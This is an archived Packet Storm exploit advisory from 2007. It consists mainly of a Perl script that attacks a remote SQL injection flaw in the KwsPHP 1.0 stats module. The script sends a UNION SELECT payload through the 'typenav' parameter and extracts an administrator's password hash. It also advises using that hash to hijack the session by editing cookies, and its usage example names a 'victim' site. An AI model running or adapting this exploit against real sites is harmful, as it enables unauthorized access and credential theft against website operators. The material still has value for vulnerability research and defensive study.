kwsstats-sql.txt

2007-09-18T00:00:00
ID PACKETSTORM:59354
Type packetstorm
Reporter S4mi
Modified 2007-09-18T00:00:00

Description

                                        
                                            `###################################################  
# Script..........................: KwsPHP ver 1.0 stats Module  
# Script Site..................: http://kws.koogar.org/  
# Vulnerability...............: Remote SQL injection Exploit  
# Access.........................: Remote  
# level.............................: Dangerous  
# Author..........................: S4mi  
# Contact.........................: S4mi[at]LinuxMail.org  
####################################################  
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39   
#  
####################################################  
# This Exploit Work Only When magic_quotes_gpc Is OFF  
#  
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin  
#Result Screen Shot :  
#+**********************+  
# Connecting ...[OK]  
# Sending Data ...[OK]  
#  
# + Exploit succeed! Getting admin information.  
# + ---------------- +  
# + Username: admin  
# + Password: e10adc3949ba59abbe56e057f20f883e  
###################################################  
#vuln code : \modules\stats\index.php line ~ 700 - 720  
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
# [code]  
# elseif(isset($aff) && ($aff=="browser"))  
# {  
# if(isset($typenav))  
# {  
# bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);  
#   
# $tot_nav=0;  
#   
# $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");  
#   
# while ($ligne = mysql_fetch_object($requete))  
# {  
# $tot_nav = $ligne->tot;  
# }  
# $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");  
# [/code]  
#########################################################  
#!/usr/bin/perl  
  
use IO::Socket ;  
  
&header();  
  
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));  
  
$host = $ARGV[0];  
$path = $ARGV[1];  
$user = $ARGV[2];  
  
  
syswrite STDOUT ,"\n Connecting ...";  
  
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);  
  
die "\n Unable to connect to $host\n" unless($sock);  
  
syswrite STDOUT, "[OK]";  
  
$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";   
  
syswrite STDOUT ,"\n Sending Data ...";  
  
print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";  
print $sock "Host: $host\n";  
print $sock "Referer: $host\n";  
print $sock "Accept-Language: en-us\n";  
print $sock "Content-Type: application/x-www-form-urlencoded\n";  
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";  
print $sock "Cache-Control: no-cache\n";  
print $sock "Connection: Close\n\n";  
  
syswrite STDOUT ,"[OK]\n\n";  
  
while($answer = <$sock>){  
  
if ($answer =~ /nav_(.*?).png/){  
print "+ Exploit succeed! Getting admin information.\n";  
print "+ ---------------- +\n";  
print "+ Username: $user\n";  
print "+ Password: $1\n";  
print "+ ----Have Fun---- +\n";  
print "+ You don't need to crack the hash password :D\n";  
print "+ Just login with ur owen information and edit the cookies\n";  
}  
}  
  
  
sub usage{  
print "\nUsage : perl $0 host /path/ UserName ";  
print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";  
exit(0);  
}  
sub header(){  
print q(  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
# Script......................: KwsPHP ver 1.0 stats Module  
# Script Site.................: http://kws.koogar.org/  
# Vulnerability...............: Remote SQL injection Exploit  
# Access......................: Remote  
# level.......................: Dangerous  
# Author......................: S4mi  
# Contact.....................: S4mi[at]LinuxMail.org  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
);  
}  
  
  
`